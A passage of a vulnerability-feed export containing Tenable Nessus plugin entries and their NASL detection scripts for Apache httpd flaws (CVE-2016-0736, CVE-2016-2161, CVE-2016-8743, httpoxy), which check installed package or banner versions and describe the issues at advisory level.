Multiple Vulnerabilities (httpoxy)\");\n script_summary(english:\"Checks the version in the server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.25. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. (CVE-2016-8743)\n\n - A CRLF injection allowing HTTP response splitting attacks for \n sites which use mod_userdir (CVE-2016-4975)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/dev/dist/Announcement2.4.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/apache/httpd/blob/2.4.x/CHANGES\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.apache.org/security/asf-httpoxy-response.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpoxy.org\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.25 or later.\n\nNote that the 'httpoxy' vulnerability can be mitigated by applying the\nworkarounds or patches as referenced in the vendor advisory\nasf-httpoxy-response.txt. Furthermore, to mitigate the other\nvulnerabilities, ensure that the affected modules (mod_session_crypto,\nmod_auth_digest, and mod_http2) are not in use.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5387\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\n\napp_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nconstraints = [\n { \"min_version\":\"2.3.0\", \"fixed_version\":\"2.4.25\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T01:21:30", "description": "The following security-related issues were fixed :\n\nPadding oracle vulnerability in Apache mod_session_crypto\n(CVE-2016-0736)\n\nDoS vulnerability in mod_auth_digest (CVE-2016-2161)\n\nApache HTTP request parsing whitespace defects (CVE-2016-8743)", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-01-20T00:00:00", "title": "Amazon Linux AMI : httpd24 (ALAS-2017-785)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:mod24_ssl", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-785.NASL", "href": "https://www.tenable.com/plugins/nessus/96631", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-785.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96631);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_xref(name:\"ALAS\", value:\"2017-785\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 (ALAS-2017-785)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following security-related issues were fixed :\n\nPadding oracle vulnerability in Apache mod_session_crypto\n(CVE-2016-0736)\n\nDoS vulnerability in mod_auth_digest (CVE-2016-2161)\n\nApache HTTP request parsing whitespace defects (CVE-2016-8743)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-785.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd24' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-debuginfo-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-devel-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-manual-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-tools-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ldap-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_proxy_html-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_session-2.4.25-1.68.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ssl-2.4.25-1.68.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd24 / httpd24-debuginfo / httpd24-devel / httpd24-manual / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-02-01T07:22:40", "description": "It was discovered that the Apache mod_session_crypto module was\nencrypting data and cookies using either CBC or ECB modes. A remote\nattacker could possibly use this issue to perform padding oracle\nattacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module\nincorrectly handled malicious input. A remote attacker could possibly\nuse this issue to cause Apache to crash, resulting in a denial of\nservice. (CVE-2016-2161)\n\nDavid Dennerline and Regis Leroy discovered that the Apache HTTP\nServer incorrectly handled unusual whitespace when parsing requests,\ncontrary to specifications. When being used in combination with a\nproxy or backend server, a remote attacker could possibly use this\nissue to perform an injection attack and pollute cache. This update\nmay introduce compatibility issues with clients that do not strictly\nfollow HTTP protocol specifications. A new configuration option\n'HttpProtocolOptions Unsafe' can be used to revert to the previous\nunsafe behaviour in problematic environments. (CVE-2016-8743).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 31, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-05-10T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : apache2 vulnerabilities (USN-3279-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:apache2-bin", "cpe:/o:canonical:ubuntu_linux:16.10", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3279-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100098", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3279-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100098);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_xref(name:\"USN\", value:\"3279-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : apache2 vulnerabilities (USN-3279-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Apache mod_session_crypto module was\nencrypting data and cookies using either CBC or ECB modes. A remote\nattacker could possibly use this issue to perform padding oracle\nattacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module\nincorrectly handled malicious input. A remote attacker could possibly\nuse this issue to cause Apache to crash, resulting in a denial of\nservice. (CVE-2016-2161)\n\nDavid Dennerline and Regis Leroy discovered that the Apache HTTP\nServer incorrectly handled unusual whitespace when parsing requests,\ncontrary to specifications. When being used in combination with a\nproxy or backend server, a remote attacker could possibly use this\nissue to perform an injection attack and pollute cache. This update\nmay introduce compatibility issues with clients that do not strictly\nfollow HTTP protocol specifications. A new configuration option\n'HttpProtocolOptions Unsafe' can be used to revert to the previous\nunsafe behaviour in problematic environments. (CVE-2016-8743).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3279-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-bin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.7-1ubuntu4.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.18-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"apache2-bin\", pkgver:\"2.4.18-2ubuntu4.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-bin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T12:32:28", "description": "This update for apache2 fixes the following security issues :\n\nSecurity issues fixed :\n\n - CVE-2016-0736: Protect mod_session_crypto data with a\n MAC to prevent padding oracle attacks (bsc#1016712).\n\n - CVE-2016-2161: Malicious input to mod_auth_digest could\n have caused the server to crash, resulting in DoS\n (bsc#1016714).\n\n - CVE-2016-8743: Added new directive 'HttpProtocolOptions\n Strict' to avoid proxy chain misinterpretation\n (bsc#1016715).\n\nBugfixes :\n\n - Add missing copy of hcuri and hcexpr from the worker to\n the health check worker (bsc#1019380).\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-04-03T00:00:00", "title": "openSUSE Security Update : apache2 (openSUSE-2017-416)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "modified": "2017-04-03T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-event", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "p-cpe:/a:novell:opensuse:apache2", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-event-debuginfo"], "id": "OPENSUSE-2017-416.NASL", "href": "https://www.tenable.com/plugins/nessus/99154", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-416.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99154);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-2017-416)\");\n script_summary(english:\"Check for the openSUSE-2017-416 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes the following security issues :\n\nSecurity issues fixed :\n\n - CVE-2016-0736: Protect mod_session_crypto data with a\n MAC to prevent padding oracle attacks (bsc#1016712).\n\n - CVE-2016-2161: Malicious input to mod_auth_digest could\n have caused the server to crash, resulting in DoS\n (bsc#1016714).\n\n - CVE-2016-8743: Added new directive 'HttpProtocolOptions\n Strict' to avoid proxy chain misinterpretation\n (bsc#1016715).\n\nBugfixes :\n\n - Add missing copy of hcuri and hcexpr from the worker to\n the health check worker (bsc#1019380).\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016712\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1019380\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-debuginfo-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-debugsource-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-devel-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-event-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-event-debuginfo-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-example-pages-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-prefork-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-prefork-debuginfo-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-utils-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-utils-debuginfo-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-worker-2.4.23-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-worker-debuginfo-2.4.23-8.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:14:50", "description": "Security fix for CVE-2016-8743, CVE-2016-2161, CVE-2016-0736\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 22, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-12-27T00:00:00", "title": "Fedora 24 : httpd (2016-d22f50d985)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "modified": "2016-12-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-D22F50D985.NASL", "href": "https://www.tenable.com/plugins/nessus/96114", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable 